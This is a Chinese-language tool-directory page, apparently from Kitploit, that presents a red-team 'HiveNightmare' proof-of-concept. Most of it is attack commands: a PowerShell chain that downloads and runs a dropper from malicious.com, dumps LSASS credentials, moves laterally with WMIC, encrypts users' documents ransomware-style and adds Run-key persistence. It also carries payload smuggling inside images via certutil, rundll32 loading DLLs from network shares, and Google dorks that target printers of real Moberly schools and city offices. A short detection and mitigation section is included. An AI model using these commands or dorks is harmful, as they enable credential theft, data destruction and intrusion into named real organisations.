Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Why-so-Serious-SAM — PoC 恶意软件利用 CVE-2021-36934(卷影副本的 ACL 配置不当),采用无文件红队方法在 Windows 10/11 上配合 LOLBins,提取 SYSTEM 和 SAM 配置单元以获取本地 NTLM 哈希值。 | Kitploit
工具/GitHubGitHub/p1rat3r00t/why-so-serious-sam
权限提升漏洞利用横向移动后渗透利用CTF渗透测试学习与教育红队实验室与实践
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC 恶意软件利用 CVE-2021-36934(卷影副本的 ACL 配置不当),采用无文件红队方法在 Windows 10/11 上配合 LOLBins,提取 SYSTEM 和 SAM 配置单元以获取本地 NTLM 哈希值。

查看仓库
131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


目录

  • 概述
  • 功能
  • 实验室模拟示例
  • 使用Google Dork进行侦察
  • LOLBins概述
  • 无文件木马嵌入
  • 利用Print Spooler与HiveNightmare
  • 反射式DLL注入
  • MITRE ATT&CK映射
  • 检测与缓解
  • 法律免责声明
  • 参考文献与延伸阅读

概述

CVE-2021-36934/HiveNightmare 是一个教育性红/紫队研究项目,在 Windows 11 上模拟无文件恶意软件攻击框架。它利用 MITRE ATT&CK 技术模拟真实对手杀伤链,重点聚焦于隐蔽、无文件的操作。

警告: 仅限隔离实验室内的研究与训练。不得在生产系统或未授权系统上使用。


功能

  • 模拟端到端的无文件勒索软件/擦除器攻击
  • 演示"生活在陆地上的二进制文件"(LOLBins)的使用
  • 展示凭据访问、权限提升、横向移动和持久化
  • 包含实用实验室和侦察示例
  • 映射至MITRE ATT&CK,供蓝队检测练习

实验室模拟示例

以下PowerShell模拟展示了一个使用内置Windows工具(LOLBins)的典型无文件勒索软件攻击链:

root@kitploit:~
# 初始访问:加载木马
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# 执行:解码并在内存中加载载荷
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/main/:Load($bytes)

# 权限提升
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# 凭据访问
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# 横向移动
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# 文件加密示例
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# 持久化
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

使用Google Dork进行侦察

示例目标: 识别密苏里州莫伯利市可能暴露的打印机服务,这些服务可能易受诸如PrintNightmare之类的漏洞攻击。

Google Dork查询示例:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins概述

"生活在陆地上的二进制文件"(LOLBins) 是合法且受信任的Windows二进制文件,攻击者常滥用它们绕过安全控制并以无文件方式运行恶意代码。

示例使用(打印服务攻击):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

攻击者使用 rundll32.exe、regsvr32.exe 和 powershell.exe 等LOLBins从网络共享执行载荷,通常是在通过侦察识别出暴露的打印机或服务器之后。


无文件木马嵌入

目标: 将存档嵌入图像中,然后使用原生工具提取,从而隐蔽地运送载荷。

步骤:

  1. 嵌入载荷:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. 提取与解码:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

该方法绕过了传统的文件扩展名过滤,并利用内置工具进行规避传递。


反射式DLL注入

技术: 使用反射加载直接在内存中加载并执行恶意DLL。

示例:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

这实现了隐蔽的内存中执行,而不会在磁盘上留下痕迹。


MITRE ATT&CK映射


检测与缓解

检测

  • Sysmon + Sigma规则:

    • 监控 rundll32.exe 加载非系统DLL
    • 监视 certutil.exe、regsvr32.exe、mshta.exe 的异常使用
    • 追踪非管理员对卷影副本的访问
  • SIEM示例(ELK/Splunk):

    • 对来自公共共享的执行告警
    • 父/子进程异常(例如 explorer.exe 生成 rundll32.exe)
    • PowerShell或CMD中的可疑编码命令

缓解

  • 在不必要的地方禁用Print Spooler:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • 应用所有安全补丁并强化ACL
  • 使用AppLocker或WDAC阻止或限制LOLBins
  • 使用能够检测反射式DLL加载和内存中攻击的EDR解决方案

法律免责声明

本仓库中的所有内容、代码和技术仅用于教育和授权渗透测试。未经明确许可,不得在受控、隔离环境之外使用本项目的任何部分。作者对滥用不承担任何责任。


参考文献与延伸阅读

  • LOLOL Farm – LOLBin Playground
  • LOLGEN – 生成LOLBin链
  • 检测SeriousSam
  • DLL注入入门
  • Print Spooler漏洞利用链
  • 无文件恶意软件 – 维基百科
  • PrintSpoofer(原始版)
  • HiveNightmare
  • MITRE ATT&CK T1055
  • HiveNightmare演示

保持安全,负责任地研究,并始终以合法且道德的方式使用。

下载工具
阶段技术ID描述
初始访问有效账户 / 路过式攻击T1078, T1189攻击暴露在外的打印接口
执行DLL侧加载 / LOLBinsT1218, T1055.001通过受信任的二进制文件反射运行DLL
权限提升Print Spooler漏洞利用 / Hive ACL滥用T1068, T1003.002获取SYSTEM级别访问权限并提取SAM哈希
防御规避无文件执行 / 混淆文件T1027, T1202通过certutil、mshta等传递编码载荷
凭据访问LSASS转储 / SAM Hive访问T1003HiveNightmare后的凭据转储
横向移动SMB/网络共享枚举T1021.002通过打印机共享或Spooler枚举扩散
影响数据破坏 / 加密T1485, T1486通过DLL载荷触发的无文件擦除器